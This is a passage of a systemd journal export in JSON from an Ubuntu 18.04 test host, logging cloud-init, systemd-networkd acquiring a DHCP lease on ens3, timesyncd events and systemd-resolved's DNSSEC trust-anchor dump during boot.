/bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "bound to 192.168.10.95 -- renewal in 33503 seconds.", 
"_SOURCE_REALTIME_TIMESTAMP" : "1615280784678463" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=233;b=e2b08827b5804427b422c10c84f1567e;m=2607d80;t=5bd16df23fce2;x=368d0957136c150f", "__REALTIME_TIMESTAMP" : "1615280814161122", "__MONOTONIC_TIMESTAMP" : "39878016", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "_STREAM_ID" : "3a93b23a9c1d4fdab05d8cac63ea7d61", "SYSLOG_IDENTIFIER" : "cloud-init", "MESSAGE" : "Cloud-init v. 19.1-1-gbaa47854-0ubuntu1~18.04.1 running 'init-local' at Tue, 09 Mar 2021 09:06:24 +0000. Up 10.17 seconds.", "_PID" : "538", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init --local", "_HOSTNAME" : "test-1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=234;b=e2b08827b5804427b422c10c84f1567e;m=261ff9d;t=5bd16df257f04;x=ecf128b801d4eacc", "__REALTIME_TIMESTAMP" : "1615280814259972", "__MONOTONIC_TIMESTAMP" : "39976861", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", 
"MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "cloud-init-local.service", "INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Initial cloud-init job (pre-networking).", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814256658" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=235;b=e2b08827b5804427b422c10c84f1567e;m=2620480;t=5bd16df2583e7;x=6dd0ca85e60b6cf7", "__REALTIME_TIMESTAMP" : "1615280814261223", "__MONOTONIC_TIMESTAMP" : "39978112", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Network (Pre).", "UNIT" : "network-pre.target", "INVOCATION_ID" : "b8f3685ee1a74adbac358b94e5d6fe6e", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814261197" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=236;b=e2b08827b5804427b422c10c84f1567e;m=2621764;t=5bd16df2596cb;x=f92c1cdfdc0c1137", "__REALTIME_TIMESTAMP" : "1615280814266059", "__MONOTONIC_TIMESTAMP" : "39982948", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : 
"unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Network Service...", "UNIT" : "systemd-networkd.service", "INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814266037" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=237;b=e2b08827b5804427b422c10c84f1567e;m=263a172;t=5bd16df2720d8;x=c41f1c6c3213eaa3", "__REALTIME_TIMESTAMP" : "1615280814366936", "__MONOTONIC_TIMESTAMP" : "40083826", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/network/networkd.c", "CODE_LINE" : "152", "CODE_FUNC" : "main", "SYSLOG_IDENTIFIER" : "systemd-networkd", "MESSAGE" : "Enumeration completed", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814366926" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=238;b=e2b08827b5804427b422c10c84f1567e;m=263b01f;t=5bd16df272f86;x=d6a27a130ebbab0d", "__REALTIME_TIMESTAMP" : "1615280814370694", "__MONOTONIC_TIMESTAMP" : "40087583", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", 
"_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-networkd.service", "INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "MESSAGE" : "Started Network Service.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814367603" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=239;b=e2b08827b5804427b422c10c84f1567e;m=263b0df;t=5bd16df273047;x=cb21fbb4e8b86f83", "__REALTIME_TIMESTAMP" : "1615280814370887", "__MONOTONIC_TIMESTAMP" : "40087775", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "CODE_LINE" : "3431", "CODE_FUNC" : "link_update", "INTERFACE" : "ens3", "MESSAGE" : "ens3: Gained carrier", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814370880" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23a;b=e2b08827b5804427b422c10c84f1567e;m=263b942;t=5bd16df2738a9;x=1e97fceaacf3cfab", "__REALTIME_TIMESTAMP" : 
"1615280814373033", "__MONOTONIC_TIMESTAMP" : "40089922", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Wait for Network to be Configured...", "UNIT" : "systemd-networkd-wait-online.service", "INVOCATION_ID" : "2f779d5a71cf4429aa193a78ff1c5862", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814371365" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23b;b=e2b08827b5804427b422c10c84f1567e;m=263bc5c;t=5bd16df273bc4;x=7f61a6b98bd750de", "__REALTIME_TIMESTAMP" : "1615280814373828", "__MONOTONIC_TIMESTAMP" : "40090716", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "9", "CODE_FILE" : "../src/timesync/timesyncd-manager.c", "CODE_LINE" : "1070", "CODE_FUNC" : "manager_network_event_handler", "SYSLOG_IDENTIFIER" : "systemd-timesyncd", "MESSAGE" : "Network configuration changed, trying to establish connection.", "_PID" : "501", "_UID" : "62583", "_GID" : "62583", "_COMM" : "systemd-timesyn", "_EXE" : "/lib/systemd/systemd-timesyncd", "_CMDLINE" : "/lib/systemd/systemd-timesyncd", "_CAP_EFFECTIVE" : "2000000", "_SYSTEMD_CGROUP" : "/system.slice/systemd-timesyncd.service", "_SYSTEMD_UNIT" : 
"systemd-timesyncd.service", "_SYSTEMD_INVOCATION_ID" : "02dc978d5d9147908ffca7c0020b3270", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814373715" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23c;b=e2b08827b5804427b422c10c84f1567e;m=263be97;t=5bd16df273dfe;x=34004f7e7f9e3d76", "__REALTIME_TIMESTAMP" : "1615280814374398", "__MONOTONIC_TIMESTAMP" : "40091287", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "INTERFACE" : "ens3", "CODE_LINE" : "3163", "CODE_FUNC" : "link_ipv6ll_gained", "MESSAGE" : "ens3: Gained IPv6LL", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814374391" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23d;b=e2b08827b5804427b422c10c84f1567e;m=263bf93;t=5bd16df273efa;x=a5c3a6ccbdc3e536", "__REALTIME_TIMESTAMP" : "1615280814374650", "__MONOTONIC_TIMESTAMP" : "40091539", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : 
"/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "CODE_FUNC" : "link_update", "INTERFACE" : "ens3", "CODE_LINE" : "3437", "MESSAGE" : "ens3: Lost carrier", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814374644" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23e;b=e2b08827b5804427b422c10c84f1567e;m=263cc6e;t=5bd16df274bd6;x=d585f0cc41c21d03", "__REALTIME_TIMESTAMP" : "1615280814377942", "__MONOTONIC_TIMESTAMP" : "40094830", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-dhcp6.c", "CODE_LINE" : "40", "CODE_FUNC" : "dhcp6_verify_link", "INTERFACE" : "lo", "MESSAGE" : "lo: Link is not managed by us", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814377900" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23f;b=e2b08827b5804427b422c10c84f1567e;m=263d92b;t=5bd16df275892;x=e4cb284037fe65d3", "__REALTIME_TIMESTAMP" : "1615280814381202", "__MONOTONIC_TIMESTAMP" : "40098091", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", 
"CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Network Name Resolution...", "UNIT" : "systemd-resolved.service", "INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814379434" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=240;b=e2b08827b5804427b422c10c84f1567e;m=263db29;t=5bd16df275a91;x=9e4386d1737efb05", "__REALTIME_TIMESTAMP" : "1615280814381713", "__MONOTONIC_TIMESTAMP" : "40098601", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "INTERFACE" : "ens3", "CODE_LINE" : "294", "CODE_FUNC" : "link_enable_ipv6", "MESSAGE" : "ens3: IPv6 successfully enabled", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814381705" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=241;b=e2b08827b5804427b422c10c84f1567e;m=264161f;t=5bd16df279586;x=b55c09cf1a27986a", "__REALTIME_TIMESTAMP" : "1615280814396806", "__MONOTONIC_TIMESTAMP" : "40113695", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : 
"e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "CODE_LINE" : "3431", "CODE_FUNC" : "link_update", "INTERFACE" : "ens3", "MESSAGE" : "ens3: Gained carrier", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814396796" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=242;b=e2b08827b5804427b422c10c84f1567e;m=26427f7;t=5bd16df27a75e;x=a6141f99eec106dd", "__REALTIME_TIMESTAMP" : "1615280814401374", "__MONOTONIC_TIMESTAMP" : "40118263", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "INTERFACE" : "ens3", "CODE_FILE" : "../src/network/networkd-dhcp4.c", "CODE_LINE" : "463", "CODE_FUNC" : "dhcp_lease_acquired", "MESSAGE" : "ens3: DHCPv4 address 192.168.10.95/24 via 192.168.10.1", "ADDRESS" : "192.168.10.95", "PREFIXLEN" : "24", "GATEWAY" : "192.168.10.1", 
"_SOURCE_REALTIME_TIMESTAMP" : "1615280814401328" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=243;b=e2b08827b5804427b422c10c84f1567e;m=2642895;t=5bd16df27a7fd;x=45c1cf1e9fb525a9", "__REALTIME_TIMESTAMP" : "1615280814401533", "__MONOTONIC_TIMESTAMP" : "40118421", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-manager.c", "CODE_LINE" : "1780", "CODE_FUNC" : "manager_set_hostname", "MESSAGE" : "Not connected to system bus, not setting hostname.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814401352" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=244;b=e2b08827b5804427b422c10c84f1567e;m=2642c5f;t=5bd16df27abc6;x=25d6a409bd6c4b00", "__REALTIME_TIMESTAMP" : "1615280814402502", "__MONOTONIC_TIMESTAMP" : "40119391", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "9", "CODE_FILE" : "../src/timesync/timesyncd-manager.c", "CODE_LINE" : "1070", "CODE_FUNC" : "manager_network_event_handler", "SYSLOG_IDENTIFIER" : "systemd-timesyncd", "MESSAGE" : "Network configuration changed, trying to establish connection.", "_PID" : "501", "_UID" : "62583", "_GID" : "62583", "_COMM" : "systemd-timesyn", "_EXE" : 
"/lib/systemd/systemd-timesyncd", "_CMDLINE" : "/lib/systemd/systemd-timesyncd", "_CAP_EFFECTIVE" : "2000000", "_SYSTEMD_CGROUP" : "/system.slice/systemd-timesyncd.service", "_SYSTEMD_UNIT" : "systemd-timesyncd.service", "_SYSTEMD_INVOCATION_ID" : "02dc978d5d9147908ffca7c0020b3270", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814402353" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=245;b=e2b08827b5804427b422c10c84f1567e;m=264e0a5;t=5bd16df28600c;x=2b63421ba744fd47", "__REALTIME_TIMESTAMP" : "1615280814448652", "__MONOTONIC_TIMESTAMP" : "40165541", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/resolve/resolved-dns-trust-anchor.c", "CODE_LINE" : "491", "CODE_FUNC" : "dns_trust_anchor_dump", "SYSLOG_IDENTIFIER" : "systemd-resolved", "MESSAGE" : "Positive Trust Anchors:", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_CAP_EFFECTIVE" : "2500", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814448547" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=246;b=e2b08827b5804427b422c10c84f1567e;m=264e25e;t=5bd16df2861c6;x=53e94fe147e04df4", "__REALTIME_TIMESTAMP" : "1615280814449094", "__MONOTONIC_TIMESTAMP" : "40165982", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/resolve/resolved-dns-trust-anchor.c", "CODE_FUNC" 
: "dns_trust_anchor_dump", "SYSLOG_IDENTIFIER" : "systemd-resolved", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_CAP_EFFECTIVE" : "2500", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "CODE_LINE" : "496", "MESSAGE" : ". IN DS 19036 8 2 49aac11d7b6f6446702e54a1607371607a1a41855200fd2ce1cdde32f24e8fb5", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814449087" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=247;b=e2b08827b5804427b422c10c84f1567e;m=264e2ca;t=5bd16df286231;x=b3656ad15fdd74e0", "__REALTIME_TIMESTAMP" : "1615280814449201", "__MONOTONIC_TIMESTAMP" : "40166090", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/resolve/resolved-dns-trust-anchor.c", "CODE_FUNC" : "dns_trust_anchor_dump", "SYSLOG_IDENTIFIER" : "systemd-resolved", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_CAP_EFFECTIVE" : "2500", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "CODE_LINE" : "496", "MESSAGE" : ". 
